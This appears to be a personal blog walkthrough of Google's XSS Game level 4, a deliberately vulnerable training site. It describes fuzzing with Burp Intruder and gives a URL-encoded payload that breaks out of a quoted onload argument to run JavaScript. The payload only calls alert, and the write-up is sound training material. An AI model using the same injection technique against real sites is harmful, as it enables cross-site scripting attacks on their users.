Sunday, 7 June 2015

XSS Methodology - Google XSS Challenge 4.

Hi All,

It has been a long time since I have put up a post so it needs to be a decent one :-) and what better way than to explain the methodology that I used whilst solving the google Hacking Challenge #4.  I did use all of the hints as I was really stumped as to what to do.  Anyway below is my methodology.



So when looking at  any XSS challenge you should have the following 
  • An interception proxy
  • A browser which will not filter out your XSS and;
  • A JS console ( I use Firebug).  
Admittedly when I started this challenge I didn't think to use the JS console when testing for XSS, but I will definitely use it from now on

Without going into details about correct encoding it is safe to say that when non alphanumeric chars are properly escaped i.e " is &quot and <> are &lt and &gt then it is harder to inject JS.  

Step 1: Find out where our string is injected in the source code
I injected a 'ZZ' this is fairly obvious to find.  So it looks like it is injected into startTimer and the divid 'message. We are more interested in the onload function as this is JS. 
 

If you did not notice the following characters will be appended to your string so we will need to work around this " ');" "


Step 2:Check what non alphanumeric characters are being encoded.
Open up python and type the following to grab all the nonalphanumeric chars. 

Each line of code does the following.
#Import Strings Module 
#Create a file to write to
#Splice the printable chars so you only have the nonalphanumeric characters then iterate through each. 
#Write each character to file including a new line after each.
 #Close the file after writing.

>>> import string
>>> fdesc = open("nonalphanumeric.txt", "w")
for i in string.printable[62:94]:
...     fdesc.write(i + "\n")
... 
>>> fdesc.close()
 You should now have a file that you can test with to see what chars are being encoded.  Keep in a safe spot for future tests ;).

Run burp intruder, load the file and fuzz the 'timer' param. 

If your response contains something like this '&#x27; ' then the character is being encoded in HTML format and the browser will correctly render it (this is a hint that Google provides).  

After running burpsuite through all of the chars I noticed that the single quote was not being encoded correctly.  Here is the html  response after injecting a single quote '

<!doctype html>
<html>
  <head>
    <!-- Internal game scripts/styles, mostly boring stuff -->
    <script src="/static/game-frame.js"></script>
    <link rel="stylesheet" href="/static/game-frame-styles.css" />

    <script>
      function startTimer(seconds) {
        seconds = parseInt(seconds) || 3;
        setTimeout(function() {
          window.confirm("Time is up!");
          window.history.back();
        }, seconds * 1000);
      }
    </script>
  </head>
  <body id="level4">
    <img src="/static/logos/level4.png" />
    <br>
    <img src="/static/loading.gif" onload="startTimer('&#39;');" />
    <br>
    <div id="message">Your timer will execute in &#39; seconds.</div>
  </body>
</html>

 So I reran the request in the browser whilst the Firebug console was open to see if any error messages were logged.

 
This is a sign that the single quote was injected and parsed as JS.  So where to next?

Open up the console and type the following to get the startTimer function in for you to muck around with. Make sure you click 'Run'


If you passed no value to the timer param i.e . http://xss-game.appspot.com/level4/frame?timer= you would have the following startTimer script in sourcecode.

startTimer(' ')

How do we create an attack.  Create two JS calls in one.  Bolded is what I typed.
startTimer('1');alert('1')

 Execute and you get your alert.

Now we need to add this to the timer param for it to execute.
 http://xss-game.appspot.com/level4/frame?timer=1');alert('1')
 
But it seems to not work as all chars after the ';' are removed. 
 

How do we solve this? We URL encode the non alpha-numeric chars so the attack string looks like this.
timer=1%27)%3balert(%27xss

In the source code we get the following.
<img src="/static/loading.gif" onload="startTimer('1&#39;);alert(&#39;xss');" />

Boom XSS

Now copy the following string into the address bar and you will pass challenge 4.

 http://xss-game.appspot.com/level4/frame?timer=1%27)%3balert(%27xss 

Hopefully this has been informative for you :).  Hack responsibly, if you have a hacking addiction please phone the help line.   1800 CNTSTPHACKING